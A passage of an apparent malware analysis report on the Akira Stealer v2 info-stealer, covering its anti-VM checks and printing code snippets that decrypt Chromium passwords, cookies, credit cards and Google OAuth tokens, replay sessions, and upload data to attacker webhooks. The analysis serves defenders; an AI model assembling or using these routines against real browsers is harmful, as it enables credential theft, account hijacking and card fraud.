Look for VirtualBox/VMware in:\n",[102,13572,13574],{"class":104,"line":13573},51,[102,13575,13576],{},"    - Registry driver entries\n",[102,13578,13580],{"class":104,"line":13579},52,[102,13581,13582],{},"    - Video card name via WMIC\n",[102,13584,13586],{"class":104,"line":13585},53,[102,13587,13588],{},"    - Presence of VM-specific folders\n",[102,13590,13592],{"class":104,"line":13591},54,[102,13593,13496],{},[102,13595,13597],{"class":104,"line":13596},55,[102,13598,13135],{},[102,13600,13602],{"class":104,"line":13601},56,[102,13603,13604],{},"        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n",[102,13606,13608],{"class":104,"line":13607},57,[102,13609,13610],{},"        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n",[102,13612,13614],{"class":104,"line":13613},58,[102,13615,13616],{},"        shell=True, capture_output=True\n",[102,13618,13620],{"class":104,"line":13619},59,[102,13621,13622],{},"    )\n",[102,13624,13626],{"class":104,"line":13625},60,[102,13627,13150],{},[102,13629,13631],{"class":104,"line":13630},61,[102,13632,13604],{},[102,13634,13636],{"class":104,"line":13635},62,[102,13637,13638],{},"        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n",[102,13640,13642],{"class":104,"line":13641},63,[102,13643,13616],{},[102,13645,13647],{"class":104,"line":13646},64,[102,13648,13622],{},[102,13650,13652],{"class":104,"line":13651},65,[102,13653,13654],{},"    gpu = any(\n",[102,13656,13658],{"class":104,"line":13657},66,[102,13659,13660],{},"        x.lower() in subprocess.run(\n",[102,13662,13664],{"class":104,"line":13663},67,[102,13665,13666],{},"            \"wmic path win32_VideoController get name\",\n",[102,13668,13670],{"class":104,"line":13669},68,[102,13671,13361],{},[102,13673,13675],{"class":104,"line":13674},69,[102,13676,13677],{},"        
).stdout.decode().splitlines()[2].lower()\n",[102,13679,13681],{"class":104,"line":13680},70,[102,13682,13683],{},"        for x in (\"virtualbox\", \"vmware\")\n",[102,13685,13687],{"class":104,"line":13686},71,[102,13688,13622],{},[102,13690,13692],{"class":104,"line":13691},72,[102,13693,13694],{},"    dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n",[102,13696,13698],{"class":104,"line":13697},73,[102,13699,13700],{},"    return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n",[102,13702,13704],{"class":104,"line":13703},74,[102,13705,11519],{"emptyLinePlaceholder":2181},[102,13707,13709],{"class":104,"line":13708},75,[102,13710,12644],{},[102,13712,13714],{"class":104,"line":13713},76,[102,13715,13224],{},[102,13717,13719],{"class":104,"line":13718},77,[102,13720,13721],{},"    \"\"\"Continuously terminate known analysis processes.\"\"\"\n",[102,13723,13725],{"class":104,"line":13724},78,[102,13726,13229],{},[186,13728,13730],{"id":13729},"_7313-execution-abort-logic","7.3.13 Execution & Abort Logic",[12,13732,192],{},[3259,13734,13735,13749,13762],{},[1257,13736,13737,13740,13741,13744,13745,13748],{},[251,13738,13739],{},"Initialization:"," Within the ",[63,13742,13743],{},"Akira.__init__()"," constructor, the malware immediately invokes ",[63,13746,13747],{},"VmProtect.isVM(1)"," to perform quick, low-overhead virtualization checks (e.g., hostname, user, HTTPS simulation).",[1257,13750,13751,13754,13755,13758,13759,13761],{},[251,13752,13753],{},"Deep Inspection:"," If the initial test passes, it calls ",[63,13756,13757],{},"VmProtect.isVM(2)",", triggering more comprehensive checks, including hardware UUID validation, hosting detection via ",[63,13760,12990],{},", and registry artifact scanning.",[1257,13763,13764,13767,13768,13770,13771,13773],{},[251,13765,13766],{},"Abort Path:"," If any check returns ",[63,13769,12332],{},", indicating a virtual or analysis environment, the code executes 
",[63,13772,12336],{},", terminating execution before any data collection or exfiltration routines.",[186,13775,13777],{"id":13776},"_7314-conclusion","7.3.14 Conclusion",[12,13779,192],{},[12,13781,399,13782,13784,13785,13787],{},[63,13783,12280],{}," module in ",[3456,13786,8365],{}," demonstrates a layered defense against analysis, leveraging both local system fingerprints and network-based heuristics. By understanding and instrumenting these precise checks, defenders can turn the tables and detect such evasive malware in operational environments.",[41,13789,13791],{"id":13790},"_74-browser-data-exfiltration","7.4 Browser Data Exfiltration",[12,13793,47],{},[12,13795,13796,13797,2901,13800,13803],{},"One of the core objectives of Akira Stealer v2 is the large-scale extraction of sensitive browser-stored data. The malware implements tailored modules to target both ",[251,13798,13799],{},"Chromium-based",[251,13801,13802],{},"Gecko-based (Firefox)"," browsers. Its capabilities include the extraction and decryption of saved passwords, cookies, credit card data, autofill entries, and even session tokens that can be repurposed for full account hijacking.",[12,13805,13806],{},[251,13807,13808],{},"1. 
Workspace Setup",[56,13810,13812],{"className":12155,"code":13811,"language":12157,"meta":65,"style":65},"client_dir = Utils.get_temp_folder()  # e.g., C:\\Windows\\Temp\\DESKTOP-1234\nos.makedirs(client_dir, exist_ok=True)\nfor sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n    os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[63,13813,13814,13819,13824,13829],{"__ignoreMap":65},[102,13815,13816],{"class":104,"line":105},[102,13817,13818],{},"client_dir = Utils.get_temp_folder()  # e.g., C:\\Windows\\Temp\\DESKTOP-1234\n",[102,13820,13821],{"class":104,"line":111},[102,13822,13823],{},"os.makedirs(client_dir, exist_ok=True)\n",[102,13825,13826],{"class":104,"line":329},[102,13827,13828],{},"for sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n",[102,13830,13831],{"class":104,"line":346},[102,13832,13833],{},"    os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[1254,13835,13836,13843,13846,13849,13852],{},[1257,13837,13838,13839],{},"Creates a disposable staging area under the system temp directory, named after the victim’s machine (%TEMP%\\DESKTOP-",[13840,13841,13842],"hostname",{},"), ensuring all exfiltrated artifacts are consolidated in one easily archiveable location.",[1257,13844,13845],{},"Isolates data by type: six dedicated subfolders (Passwords, Cookies, CreditCards, History, Autofill, Wallets) prevent naming collisions and simplify later zipping—each extraction routine writes only into its own folder.",[1257,13847,13848],{},"Idempotent directory creation uses exist_ok=True so if the malware re-runs (e.g., on reboot or persistence), it won’t crash or overwrite existing data—new items simply append into the same structure.",[1257,13850,13851],{},"Facilitates selective cleanup: once upload and notification are complete, the stealer can call Utils.clear_client_folder() to recursively delete only its own workspace, leaving no residual files 
behind.",[1257,13853,13854],{},"Sets the stage for parallel extraction threads: by pre-creating all targets, background threads harvesting browser credentials, cookies, autofills, crypto-wallet data, etc., can immediately write results without additional checks, minimizing overhead and reducing the window for defensive hooks to detect unexpected file I/O.",[12,13856,13857],{},[251,13858,13859],{},"2. Supported Browsers",[1254,13861,13862,13905],{},[1257,13863,13864,13867],{},[251,13865,13866],{},"Chromium‑based",[1254,13868,13869,13872,13875,13878,13881,13884,13887,13890,13893,13896,13899,13902],{},[1257,13870,13871],{},"Google Chrome (Stable & SxS)",[1257,13873,13874],{},"Microsoft Edge",[1257,13876,13877],{},"Brave Browser",[1257,13879,13880],{},"Opera & Opera GX",[1257,13882,13883],{},"Chromium",[1257,13885,13886],{},"Comodo Dragon",[1257,13888,13889],{},"Epic Privacy Browser",[1257,13891,13892],{},"Iridium Browser",[1257,13894,13895],{},"UR Browser",[1257,13897,13898],{},"Vivaldi Browser",[1257,13900,13901],{},"Yandex Browser",[1257,13903,13904],{},"Slimjet, Amigo, Torch, Kometa, Orbitum, CentBrowser, 7Star, Sputnik, Uran",[1257,13906,13907,13910,13911,1288,13914,13925,13927,13928,13937,13939,13940,805,13943,13946],{},[251,13908,13909],{},"Firefox‑based"," (via ",[63,13912,13913],{},"GeckoDriver",[1254,13915,13916,13919,13922],{},[1257,13917,13918],{},"Mozilla Firefox",[1257,13920,13921],{},"Waterfox",[1257,13923,13924],{},"Pale Moon",[531,13926],{},"Akira dynamically locates user profiles using environment variables and well-known directory structures:",[56,13929,13931],{"className":12155,"code":13930,"language":12157,"meta":65,"style":65},"user_path = os.path.join(os.getenv(\"LOCALAPPDATA\"), \"Google\", \"Chrome\", \"User Data\")\n",[63,13932,13933],{"__ignoreMap":65},[102,13934,13935],{"class":104,"line":105},[102,13936,13930],{},[531,13938],{},"It recursively checks for available browser profiles (e.g. 
",[63,13941,13942],{},"Default",[63,13944,13945],{},"Profile 1",", etc.) and targets SQLite databases within those paths.",[186,13948,13950],{"id":13949},"_741-data-types-extracted","7.4.1 Data Types Extracted",[12,13952,192],{},[417,13954,420,13955],{"style":12346},[438,13956,13957,420,13970,420,13983,420,13995,420,14007,420,14019,420,14030],{},[426,13958,424,13959,424,13963,424,13967,420],{},[430,13960,13962],{"style":13961},"text-align: left; width: 22%;","Data Type",[430,13964,13966],{"style":13965},"text-align: left; width: 28%;","Source File",[430,13968,13969],{"style":12514},"Notes",[426,13971,424,13972,424,13975,424,13980,420],{},[443,13973,13974],{},"Saved Passwords",[443,13976,13977,13979],{},[63,13978,8280],{}," (Chromium)",[443,13981,13982],{},"Decrypted via DPAPI or AES-GCM (post Chromium v80)",[426,13984,424,13985,424,13988,424,13992,420],{"style":12370},[443,13986,13987],{},"Cookies",[443,13989,13990],{},[63,13991,13987],{},[443,13993,13994],{},"Can include session tokens, especially for Google/Facebook accounts",[426,13996,424,13997,424,14000,424,14004,420],{},[443,13998,13999],{},"Autofill Data",[443,14001,14002],{},[63,14003,8283],{},[443,14005,14006],{},"Addresses, emails, phone numbers, etc.",[426,14008,424,14009,424,14012,424,14016,420],{"style":12370},[443,14010,14011],{},"Credit Cards",[443,14013,14014],{},[63,14015,8283],{},[443,14017,14018],{},"Encrypted; requires master key",[426,14020,424,14021,424,14024,424,14027,420],{},[443,14022,14023],{},"Session Tokens",[443,14025,14026],{},"In-memory & cookies",[443,14028,14029],{},"Includes Gmail, Google accounts, and Discord OAUTH replay",[426,14031,424,14032,424,14035,424,14043,420],{"style":12370},[443,14033,14034],{},"History & URLs",[443,14036,14037,805,14040],{},[63,14038,14039],{},"History",[63,14041,14042],{},"Visited Links",[443,14044,14045],{},"Were also exfiltrated to the attacker",[52,14047],{"className":14048},[8535,8536],[12,14050,14051,14054],{},[251,14052,14053],{},"3. 
Extraction Modules","\nWhen malware authors target browsers, their primary treasure troves are the various SQLite databases where Chrome, Firefox, and their kin store credentials, cookies, history, and autofill entries. astor.py stitches together lightweight Python and native APIs to methodically pluck every piece of data—and even replay live OAuth sessions—without leaving a trace. Below is an in-depth, module-by-module tour, verbatim from the code.",[186,14056,14058,14059,1288],{"id":14057},"_742-password-dumper-chromiumgetpasswords","7.4.2 Password Dumper (",[63,14060,14061],{},"Chromium.GetPasswords",[12,14063,192],{},[12,14065,14066],{},"This module systematically searches through all Chromium-based browser profiles to extract saved login credentials. By targeting the Login Data SQLite database, it retrieves usernames and encrypted passwords, then uses the platform’s encryption key (retrieved via DPAPI or AES-GCM) to decrypt them into cleartext. These credentials are highly valuable for post-compromise pivoting or account takeover.",[56,14068,14070],{"className":12155,"code":14069,"language":12157,"meta":65,"style":65},"for root, _, files in os.walk(self.BrowserPath):\n    for file in files:\n        if file.lower() == \"login data\":\n            # Copy DB → open → extract rows\n            results = cursor.execute(\n                \"SELECT origin_url, username_value, password_value FROM logins\"\n            ).fetchall()\n            for url, user, pwd_blob in results:\n                clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n                passwords.append((url, user, clear_pwd))\n",[63,14071,14072,14077,14082,14087,14092,14097,14102,14107,14112,14117],{"__ignoreMap":65},[102,14073,14074],{"class":104,"line":105},[102,14075,14076],{},"for root, _, files in os.walk(self.BrowserPath):\n",[102,14078,14079],{"class":104,"line":111},[102,14080,14081],{},"    for file in files:\n",[102,14083,14084],{"class":104,"line":329},[102,14085,14086],{},"        
if file.lower() == \"login data\":\n",[102,14088,14089],{"class":104,"line":346},[102,14090,14091],{},"            # Copy DB → open → extract rows\n",[102,14093,14094],{"class":104,"line":650},[102,14095,14096],{},"            results = cursor.execute(\n",[102,14098,14099],{"class":104,"line":656},[102,14100,14101],{},"                \"SELECT origin_url, username_value, password_value FROM logins\"\n",[102,14103,14104],{"class":104,"line":662},[102,14105,14106],{},"            ).fetchall()\n",[102,14108,14109],{"class":104,"line":668},[102,14110,14111],{},"            for url, user, pwd_blob in results:\n",[102,14113,14114],{"class":104,"line":674},[102,14115,14116],{},"                clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n",[102,14118,14119],{"class":104,"line":680},[102,14120,14121],{},"                passwords.append((url, user, clear_pwd))\n",[1254,14123,14124,14137,14143,14151,14168],{},[1257,14125,14126,14129,14130,14132,14133,14136],{},[251,14127,14128],{},"Locates"," every ",[63,14131,8280],{}," SQLite database under the browser’s ",[63,14134,14135],{},"User Data"," folder.",[1257,14138,14139,14142],{},[251,14140,14141],{},"Copies"," to a temp file to avoid browser locks.",[1257,14144,14145,1061,14148,1013],{},[251,14146,14147],{},"SQL Query",[63,14149,14150],{},"SELECT origin_url, username_value, password_value FROM logins",[1257,14152,14153,14156,14157,14160,14161,1304,14164,14167],{},[251,14154,14155],{},"Decrypts"," each ",[63,14158,14159],{},"password_value"," blob via AES‑GCM (",[63,14162,14163],{},"v10",[63,14165,14166],{},"v11",") or Windows DPAPI fallback.",[1257,14169,14170,14173,14174,1013],{},[251,14171,14172],{},"Writes"," output to ",[63,14175,14176],{},"Passwords/\u003CBrowserName> Passwords.txt",[186,14178,14180,14181,1288],{"id":14179},"_743-credit-card-dumper-chromiumgetcreditcards","7.4.3 Credit Card Dumper (",[63,14182,14183],{},"Chromium.GetCreditCards",[12,14185,192],{},[12,14187,14188],{},"Here, the stealer accesses 
stored credit card data from each browser profile’s Web Data file. It focuses on extracting expiration details and encrypted credit card numbers, which are then decrypted with the same logic as passwords. Although CVV codes are typically not stored, the recovered information can still be misused for card-not-present fraud.",[56,14190,14192],{"className":12155,"code":14191,"language":12157,"meta":65,"style":65},"results = cursor.execute(\n    \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n).fetchall()\nfor month, year, enc_cc in results:\n    cc_number = self.Decrypt(enc_cc, encryptionKey)\n    ccs.append((cc_number, month, year))\n",[63,14193,14194,14199,14204,14209,14214,14219],{"__ignoreMap":65},[102,14195,14196],{"class":104,"line":105},[102,14197,14198],{},"results = cursor.execute(\n",[102,14200,14201],{"class":104,"line":111},[102,14202,14203],{},"    \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n",[102,14205,14206],{"class":104,"line":329},[102,14207,14208],{},").fetchall()\n",[102,14210,14211],{"class":104,"line":346},[102,14212,14213],{},"for month, year, enc_cc in results:\n",[102,14215,14216],{"class":104,"line":650},[102,14217,14218],{},"    cc_number = self.Decrypt(enc_cc, encryptionKey)\n",[102,14220,14221],{"class":104,"line":656},[102,14222,14223],{},"    ccs.append((cc_number, month, year))\n",[1254,14225,14226,14235,14242,14250],{},[1257,14227,14228,14231,14232,14234],{},[251,14229,14230],{},"Targets"," the ",[63,14233,8283],{}," SQLite stores under each profile.",[1257,14236,14237,1061,14239,1013],{},[251,14238,14147],{},[63,14240,14241],{},"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards",[1257,14243,14244,540,14246,14249],{},[251,14245,14155],{},[63,14247,14248],{},"card_number_encrypted"," exactly like the password blobs.",[1257,14251,14252,14255,14256,1013],{},[251,14253,14254],{},"Outputs"," to 
",[63,14257,14258],{},"CreditCards/\u003CBrowserName> CreditCards.txt",[186,14260,14262,14263,1288],{"id":14261},"_744-cookie-dumper-chromiumgetcookies","7.4.4 Cookie Dumper (",[63,14264,14265],{},"Chromium.GetCookies",[12,14267,192],{},[12,14269,14270],{},"Cookies, especially session cookies, are prime targets for account hijacking without passwords. This module dumps all cookie files across profiles, decrypts them, and collects essential metadata like domain, name, and expiration. Combined with fingerprinting, these cookies can enable seamless replay attacks on authenticated services.",[56,14272,14274],{"className":12155,"code":14273,"language":12157,"meta":65,"style":65},"results = cursor.execute(\n    \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n).fetchall()\nfor host, name, path, blob, expiry in results:\n    cookie_val = self.Decrypt(blob, encryptionKey)\n    cookies.append((host, name, path, cookie_val, expiry))\n",[63,14275,14276,14280,14285,14289,14294,14299],{"__ignoreMap":65},[102,14277,14278],{"class":104,"line":105},[102,14279,14198],{},[102,14281,14282],{"class":104,"line":111},[102,14283,14284],{},"    \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n",[102,14286,14287],{"class":104,"line":329},[102,14288,14208],{},[102,14290,14291],{"class":104,"line":346},[102,14292,14293],{},"for host, name, path, blob, expiry in results:\n",[102,14295,14296],{"class":104,"line":650},[102,14297,14298],{},"    cookie_val = self.Decrypt(blob, encryptionKey)\n",[102,14300,14301],{"class":104,"line":656},[102,14302,14303],{},"    cookies.append((host, name, path, cookie_val, expiry))\n",[1254,14305,14306,14314,14322,14330],{},[1257,14307,14308,14129,14311,14313],{},[251,14309,14310],{},"Scans",[63,14312,13987],{}," SQLite database.",[1257,14315,14316,540,14319,1013],{},[251,14317,14318],{},"Selects",[63,14320,14321],{},"host_key, name, path, encrypted_value, 
expires_utc",[1257,14323,14324,14156,14326,14329],{},[251,14325,14155],{},[63,14327,14328],{},"encrypted_value"," blob to reveal the actual cookie string.",[1257,14331,14332,14335,14336,1013],{},[251,14333,14334],{},"Saves"," into ",[63,14337,14338],{},"Cookies/\u003CBrowserName> Cookies.txt",[186,14340,14342,14343,1288],{"id":14341},"_745-google-session-dumper-chromiumdump_google_sessions","7.4.5 Google Session Dumper (",[63,14344,14345],{},"Chromium.dump_google_sessions",[12,14347,192],{},[12,14349,14350],{},"One of the more advanced components, this routine decrypts stored OAuth tokens from the token_service table. By replaying them via Google’s multilogin endpoint, the malware can regenerate active session cookies—allowing attackers to hijack Google accounts without credentials. This illustrates how access tokens have become prime targets in modern stealers.",[56,14352,14354],{"className":12155,"code":14353,"language":12157,"meta":65,"style":65},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\nfor service, blob in cursor.fetchall():\n    iv = blob[3:15]\n    ciphertext = blob[15:-16]\n    cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n    token = cipher.decrypt(ciphertext).decode()\n    # Replays via POST to OAuth endpoint\n    response = requests.post(\n        \"https://accounts.google.com/oauth/multilogin\",\n        headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n        data={\"source\": \"com.google.Drive\"}\n    )\n    save each account’s cookies to file\n",[63,14355,14356,14361,14366,14371,14376,14381,14386,14391,14396,14401,14406,14411,14415],{"__ignoreMap":65},[102,14357,14358],{"class":104,"line":105},[102,14359,14360],{},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\n",[102,14362,14363],{"class":104,"line":111},[102,14364,14365],{},"for service, blob in cursor.fetchall():\n",[102,14367,14368],{"class":104,"line":329},[102,14369,14370],{},"    iv = 
blob[3:15]\n",[102,14372,14373],{"class":104,"line":346},[102,14374,14375],{},"    ciphertext = blob[15:-16]\n",[102,14377,14378],{"class":104,"line":650},[102,14379,14380],{},"    cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n",[102,14382,14383],{"class":104,"line":656},[102,14384,14385],{},"    token = cipher.decrypt(ciphertext).decode()\n",[102,14387,14388],{"class":104,"line":662},[102,14389,14390],{},"    # Replays via POST to OAuth endpoint\n",[102,14392,14393],{"class":104,"line":668},[102,14394,14395],{},"    response = requests.post(\n",[102,14397,14398],{"class":104,"line":674},[102,14399,14400],{},"        \"https://accounts.google.com/oauth/multilogin\",\n",[102,14402,14403],{"class":104,"line":680},[102,14404,14405],{},"        headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n",[102,14407,14408],{"class":104,"line":12692},[102,14409,14410],{},"        data={\"source\": \"com.google.Drive\"}\n",[102,14412,14413],{"class":104,"line":12698},[102,14414,13622],{},[102,14416,14417],{"class":104,"line":12704},[102,14418,14419],{},"    save each account’s cookies to file\n",[1254,14421,14422,14438,14448,14458],{},[1257,14423,14424,540,14427,14430,14431,14434,14435,14437],{},[251,14425,14426],{},"Fetches",[63,14428,14429],{},"service"," and raw ",[63,14432,14433],{},"encrypted_token"," from ",[63,14436,8283],{}," clone.",[1257,14439,14440,14443,14444,14447],{},[251,14441,14442],{},"AES‑GCM decryption"," using the browser’s ",[63,14445,14446],{},"Local State"," key.",[1257,14449,14450,14453,14454,14457],{},[251,14451,14452],{},"Replays"," decrypted tokens in a POST to Google’s ",[63,14455,14456],{},"multilogin"," API to reconstruct valid OAuth cookies.",[1257,14459,14460,14462,14463,1013],{},[251,14461,14172],{}," per-account session files under ",[63,14464,14465],{},"Cookies/\u003Cdisplay_email> Google Session.txt",[186,14467,14469,14470,1288],{"id":14468},"_746-history-dumper-chromiumgethistory","7.4.6 History Dumper 
(",[63,14471,14472],{},"Chromium.GetHistory",[12,14474,192],{},[12,14476,14477],{},"This function extracts browsing history entries including URL, title, and visit frequency. Beyond privacy invasion, this data helps attackers understand victim behavior, identify high-value targets (e.g., banking portals), or tailor social engineering payloads.",[56,14479,14481],{"className":12155,"code":14480,"language":12157,"meta":65,"style":65},"results = cursor.execute(\n    \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n).fetchall()\nhistory.sort(key=lambda x: x[3], reverse=True)\nreturn [(url, title, count) for url, title, count, _ in history]\n",[63,14482,14483,14487,14492,14496,14501],{"__ignoreMap":65},[102,14484,14485],{"class":104,"line":105},[102,14486,14198],{},[102,14488,14489],{"class":104,"line":111},[102,14490,14491],{},"    \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n",[102,14493,14494],{"class":104,"line":329},[102,14495,14208],{},[102,14497,14498],{"class":104,"line":346},[102,14499,14500],{},"history.sort(key=lambda x: x[3], reverse=True)\n",[102,14502,14503],{"class":104,"line":650},[102,14504,14505],{},"return [(url, title, count) for url, title, count, _ in history]\n",[1254,14507,14508,14519,14529],{},[1257,14509,14510,540,14512,14515,14516,14518],{},[251,14511,14318],{},[63,14513,14514],{},"url, title, visit_count, last_visit_time"," from every ",[63,14517,14039],{}," DB.",[1257,14520,14521,14524,14525,14528],{},[251,14522,14523],{},"Sorts"," entries by ",[63,14526,14527],{},"last_visit_time"," descending.",[1257,14530,14531,540,14533,1013],{},[251,14532,14254],{},[63,14534,14535],{},"History/\u003CBrowserName> History.txt",[186,14537,14539,14540,1288],{"id":14538},"_747-autofill-dumper-chromiumgetautofills","7.4.7 Autofill Dumper (",[63,14541,14542],{},"Chromium.GetAutofills",[12,14544,192],{},[12,14546,14547],{},"Autofill entries—like addresses, names, emails, and sometimes payment-related data—are scraped from the 
browser’s Web Data storage. These values may not seem critical, but when aggregated, they offer a rich profile of the victim’s identity and behavior.",[56,14549,14551],{"className":12155,"code":14550,"language":12157,"meta":65,"style":65},"results = cursor.execute(\n    \"SELECT name, value FROM autofill\"\n).fetchall()\nfor field, value in results:\n    autofills.append((field.strip(), value.strip()))\n",[63,14552,14553,14557,14562,14566,14571],{"__ignoreMap":65},[102,14554,14555],{"class":104,"line":105},[102,14556,14198],{},[102,14558,14559],{"class":104,"line":111},[102,14560,14561],{},"    \"SELECT name, value FROM autofill\"\n",[102,14563,14564],{"class":104,"line":329},[102,14565,14208],{},[102,14567,14568],{"class":104,"line":346},[102,14569,14570],{},"for field, value in results:\n",[102,14572,14573],{"class":104,"line":650},[102,14574,14575],{},"    autofills.append((field.strip(), value.strip()))\n",[1254,14577,14578,14591],{},[1257,14579,14580,14582,14583,14586,14587,14590],{},[251,14581,14426],{}," form-fill entries: ",[63,14584,14585],{},"name, value"," from the ",[63,14588,14589],{},"web data"," file.",[1257,14592,14593,14595,14596,1013],{},[251,14594,14172],{}," out as ",[63,14597,14598],{},"Autofill/\u003CBrowserName> Autofill.txt",[186,14600,14602,14603,14605,14606,1288],{"id":14601},"_748-firefox-profile-grabber-geckodriver-grabfirefoxprofiles","7.4.8 Firefox Profile Grabber (",[63,14604,13913],{}," & ",[63,14607,14608],{},"grabFirefoxProfiles",[12,14610,192],{},[12,14612,14613],{},"Unlike the granular Chromium routines, this function opts for a broad approach: it compresses the entire Firefox profile directory—including saved logins, cookies, and bookmarks—and exfiltrates it wholesale. 
This ensures attackers can analyze or extract data offline, bypassing decryption hurdles with known NSS tooling.",[56,14615,14617],{"className":12155,"code":14616,"language":12157,"meta":65,"style":65},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n    for root, dirs, files in os.walk(source_path):\n        zipf.write(each file)\n# Upload via GoFile/File.io, then POST via attacker webhooks\n",[63,14618,14619,14624,14629,14634],{"__ignoreMap":65},[102,14620,14621],{"class":104,"line":105},[102,14622,14623],{},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n",[102,14625,14626],{"class":104,"line":111},[102,14627,14628],{},"    for root, dirs, files in os.walk(source_path):\n",[102,14630,14631],{"class":104,"line":329},[102,14632,14633],{},"        zipf.write(each file)\n",[102,14635,14636],{"class":104,"line":346},[102,14637,14638],{},"# Upload via GoFile/File.io, then POST via attacker webhooks\n",[1254,14640,14641,14651,14661],{},[1257,14642,14643,14646,14647,14650],{},[251,14644,14645],{},"Zips"," the entire ",[63,14648,14649],{},"%APPDATA%\\Mozilla\\Firefox\\Profiles"," directory.",[1257,14652,14653,14656,14657,14660],{},[251,14654,14655],{},"Names"," it ",[63,14658,14659],{},"%TEMP%\\\u003CComputerName>_Firefox_profiles.zip"," and sends the download link over the same webhook channels.",[1257,14662,14663,14666,14667,805,14670,805,14673,14676],{},[251,14664,14665],{},"Also"," invokes the same SQLite-based extraction functions (",[63,14668,14669],{},"logins.json",[63,14671,14672],{},"cookies.sqlite",[63,14674,14675],{},"places.sqlite",") against each Firefox profile using the NSS decryption routines already present.",[186,14678,14680],{"id":14679},"_749-extraction-summary","7.4.9 Extraction Summary",[12,14682,192],{},[12,14684,14685,14686,805,14688,805,14690,805,14692,9866,14694,14697,14698,14701,14702,14704,14705,805,14707,9866,14709,14711,14712,14715],{},"Astor.py orchestrates a comprehensive browser compromise by systematically harvesting every credential and 
session artifact across Chromium-based and Firefox clients. It locates and safely copies each SQLite store—",[63,14687,8280],{},[63,14689,8283],{},[63,14691,13987],{},[63,14693,14039],{},[63,14695,14696],{},"autofill","—then runs targeted SQL queries to extract URLs, usernames, passwords, credit-card details, cookies, browsing history, and form-fill entries. Passwords and payment data are decrypted via AES-GCM (or Windows DPAPI fallback), while cookies are similarly unwrapped to reveal their plaintext values. For Google accounts, encrypted OAuth tokens from ",[63,14699,14700],{},"token_service"," are decrypted and replayed against the ",[63,14703,14456],{}," API to regenerate live session cookies. Finally, Firefox profiles are archived wholesale (including ",[63,14706,14669],{},[63,14708,14672],{},[63,14710,14675],{},") and delivered as ZIPs, ensuring no artifact is left behind. This end-to-end pipeline runs silently under ",[63,14713,14714],{},"%TEMP%\\\u003CComputerName>",", producing neatly organized output files for every data category.",[41,14717,14719],{"id":14718},"_75-decryption-logic","7.5 Decryption Logic",[12,14721,47],{},[12,14723,14724],{},"Modern browsers like Chrome and Edge encrypt sensitive data—such as passwords, cookies, and credit card details—before storing them locally. Akira includes built-in decryption routines tailored to handle both legacy and current Chromium encryption methods. This ensures it can extract cleartext data regardless of the system's patch level or browser version.",[12,14726,14727],{},"At the core of this process is the extraction and decryption of the browser’s master encryption key, stored in a file called Local State. 
Depending on the browser version and Windows build, Akira dynamically selects the appropriate decryption method:",[12,14729,14730],{},"DPAPI (Data Protection API) is used on older systems, where Chrome stores secrets protected by the current user's Windows credentials.",[12,14732,14733],{},"AES-GCM is used on modern Chromium builds, where a randomly generated master key is itself encrypted with DPAPI, then used for in-app encryption of user data.",[12,14735,14736],{},"By first decrypting the Local State master key, Akira gains the ability to unlock all browser secrets—paving the way for extracting credentials, tokens, cookies, and more.",[12,14738,14739],{},[251,14740,14741],{},"Key extraction",[56,14743,14745],{"className":12155,"code":14744,"language":12157,"meta":65,"style":65},"local_state_path = os.path.join(user_path, \"Local State\")\nwith open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n    local_state = json.load(f)\nmaster_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[63,14746,14747,14752,14757,14762],{"__ignoreMap":65},[102,14748,14749],{"class":104,"line":105},[102,14750,14751],{},"local_state_path = os.path.join(user_path, \"Local State\")\n",[102,14753,14754],{"class":104,"line":111},[102,14755,14756],{},"with open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n",[102,14758,14759],{"class":104,"line":329},[102,14760,14761],{},"    local_state = json.load(f)\n",[102,14763,14764],{"class":104,"line":346},[102,14765,14766],{},"master_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[12,14768,14769],{},[251,14770,14771],{},"Decryption (AES-GCM):",[56,14773,14775],{"className":12155,"code":14774,"language":12157,"meta":65,"style":65},"nonce = value[3:15]\nciphertext = value[15:-16]\ntag = value[-16:]\ncipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\ndecrypted = cipher.decrypt_and_verify(ciphertext, 
